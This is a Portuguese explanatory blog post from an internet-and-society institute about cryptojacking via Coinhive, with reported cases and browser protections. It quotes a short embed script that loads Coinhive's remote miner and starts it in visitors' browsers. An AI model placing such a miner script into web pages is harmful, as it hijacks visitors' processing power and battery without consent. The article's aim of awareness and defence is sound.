Blog

Criptosequestro de processamento: o que é isso e como se proteger?

Escrito por

11 de dezembro de 2017

Não é de hoje que administradores de websites buscam maneiras de lucrar com os usuários e seus acessos, com os intuitos mais variáveis possíveis, sendo como fonte de lucro direto ou como alternativa para manter a iniciativa do próprio site. Foi assim com publicidade direta, adwares, spywares, posts patrocinados e conteúdos premium. Acontece que, com a inovação e novas tecnologias ganhando espaço, como as criptomoedas, os administradores de websites encontraram outra forma de conseguir obter lucro com seus usuários: utilizando o SEU processamento para minerar criptomoedas (caso queira entender mais sobre criptomoedas, assista aqui ao Café & Chat: Blockchain e Bitcoin, ou ao Bytes de Informação: Criptomoedas e Blockchain clicando aqui).

Essa prática é extremamente nova e tem sido chamada de cryptojacking ou criptosequestro e tem acontecido como forma de ciberataque e também como alternativa de lucro dos próprios administradores de diversos websites, alguns mais notórios e que serão exemplificados ao final, como: Sites do governo, Piratebay, UFC,  Jornalivre do MBL e vários outros com os mais variados fins. Essa ação basicamente sequestra o poder de processamento do seu computador e sua placa de vídeo para minerar criptomoedas para terceiros, que você nem imagina quem são.. A prática de minerar é chamada assim pois é uma ação que requer muito esforço computacional e poder de processamento, fazendo com que lentamente uma nova moeda esteja disponível, como um gasto de trabalho para extrair commodities, só que em ao invés de ferramentas reais como pás e picaretas, essa mineração é realizada digitalmente, por computadores que ficam realizando infinitas equações e funções matemáticas muito complexas, obtendo como recompensa proporcional ao poder de processamento cedido a geração de blocos de novas moedas. Sendo assim, os donos dos websites cedem a capacidade de processamento sequestrada à disposição na rede de mineração das criptomoedas, sendo recompensados com frações de criptomoedas e obtendo lucro com o computador de milhares de usuários dos seus sites. Apesar de ainda estar acontecendo em uma escala não tão grande, é uma praticamente extremamente preocupante e demanda atenção, visto que de acordo com alguns testes realizados por usuários, percebeu-se que: a velocidade de execução das tarefas cresceu por volta de 20%, o gasto da capacidade de processamento aumentou 14%, intenso aumento da temperatura da máquina, maior gasto de bateria e consequentemente redução da autonomia da bateria de notebooks.

Como acontece e como começou?

Tudo começou com uma empresa denominada Coinhive , que criou um código que une diversos computadores de usuários para minerar moedas digitais. A empresa construiu um discurso baseado em oferecer uma nova maneira de obter lucros em sites, basicamente disparando um script de mineração no computador dos visitantes, obtendo uma parte do lucro para ela (30%) e o restante para o dono do website (70%). A Coinhive tem utilizado seu software para minerar a moeda Monero, que é muito mais simples para minerar que a moeda Bitcoin, que  demanda chips específicos e um altíssimo poder de processamento.

No site da empresa é possível ver todo seu modelo de negócio, o código utilizado e os produtos que ela oferece: sequestro pelo captcha, por links encurtados e pelo simples acesso ao site. A empresa utiliza apenas poucas linhas de código, que são semelhantes a essas e podem ser visualizadas no código fonte dos sites que utilizam o script:

<script src=“https://coinhive.com/lib/coinhive.min.js”></script>
<script>
var miner = new CoinHive.User(‘<site-key>’, ‘john-doe’);
miner.start();
</script>

Ao ser ativado, esse script faz um sequestro de todo o processamento da máquina, fazendo com que a bateria acabe muito mais rápido, que o computador fique lento e gastando energia com muito mais intensidade.

Exemplo do script ativado em um computador i5 com 2.6ghz

Os administradores dos sites possuem um painel com todas as informações de mineração do seu website, podendo acompanhar a taxa de mineração, o quanto estão lucrando e a quantidade total de hashes.

Painel de controle do administrador do site que utiliza o Coinhive

 

Dessa forma, o modelo de negócio da Coinhive é extremamente completo, complexo e preocupante: oferece aos administradores controle total do sequestramento de processamento, cobra taxas e constrói um discurso de melhoria na prestação de serviços com a diminuição das publicidades.

Casos recentes e notórios

O site Cidadão.SP do governo de SP

O advogado da Google, Felipe Hoffa denunciou em seu twitter que o site www.cidadao.sp.gov.br estaria utilizando do Coinhive para sequestrar o processamento de seus usuários.

Script Coinhive detectado no código fonte do site Cidadão.SP

Após a denúncia o governo alegou que não tinha utilizado da ferramenta e removeu de seu site.

O site Piratebay

A página estava utilizando o código JavaScript da Coinhive. A utilização foi feita de maneira intencional e foi confirmada pela própria equipe do The Pirate Bay, que afirmou ter utilizado por volta de 24 horas como um teste de uma nova maneira de gerar renda.

Gráfico de processamento ao acessar o site The Pirate Bay

O site de Natal da Ri Happy

O site também foi denunciado pelo Twitter e não aconteceu uma resposta da empresa. O script estava operando no site www.umacasadenatal.rihappy.com.br e foi removido após a movimentação dos usuários.

Script Coinhive encontrado no site de Natal da Ri Happy

Como proteger?

As tecnologias trazem inúmeras facilidades e comodidades em nossas vidas, entretanto trazem alguns empecilhos que devem ser combatidos por toda a sociedade.Não iriamos deixar vocês assustados e não oferecer algumas maneiras de lidar com esse novo problema, segue abaixo algumas maneiras de se proteger:

No Coin

No Coin é uma extensão open source criada por um programador suíço chamado Rafael Keramidas que está disponível para Google Chrome, Firefox e Opera. Basta instalá-la na loja de extensões do Google chrome ou do Firefox, a ferramenta é muito simples de usar, não sendo necessário nem configurar, basta baixar e instalar a extensão para que esteja protegido.

No Coin no Chrome Web Store

Script Blocker

O script blocker é uma extensão que bloqueia a execução de todos os scripts enquanto estiver ativo. Também pode ser baixado nas lojas do Firefox e do Chrome e está apto para uso após a instalação.

Script Blocker no Chrome Web Store

Tor

O Tor é um navegador focado em segurança e privacidade, sendo assim, não é possível os scripts rodarem automaticamente, não executando assim o script da Coinhive.

Logotipo do navegador Tor

Agora você já sabe o que é o sequestro de processamento, como funciona e como se proteger. É importante nos atentarmos ao problema e colocarmos em discussão antes que se torne regra em todos os sites, podendo ser um grande empecilho na vida dos usuários. Está esperando o quê? Proteja-se e compartilhe com seus amigos!

As opiniões e perspectivas retratadas neste artigo pertencem a seus autores e não necessariamente refletem as políticas e posicionamentos oficiais do Instituto de Referência em Internet e Sociedade.

Escrito por

Bracharel em Direito pela Universidade Federal de Minas Gerais e concluiu o ensino médio integrado ao curso Técnico em Informática pelo Instituto Federal de Minas Gerais (IFMG). Compôs a equipe de coordenação do GNET – Grupo de Estudos Internacionais de Propriedade Intelectual, Internet e Inovação no ano de 2017.

Foi pesquisador do Instituto de Referência em Internet e Sociedade (IRIS) e pesquisador fundador do grupo de pesquisa DTI – Direito, Tecnologia e Inovação. Atuou também como consultor jr. no escritório Alexandre Atheniense em serviços de compliance corporativo digital em redes hospitalares.

Foi alumni da Escola de Governança da Internet do Comitê Gestor da Internet no Brasil em São Paulo e bolsista do programa Youth@IGF (2017) do Comitê Gestor da Internet no Brasil (CGI.br) para participar do 12.ª Internet Governance Fórum no Palácio das Nações na Suíça.

1 comentário

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *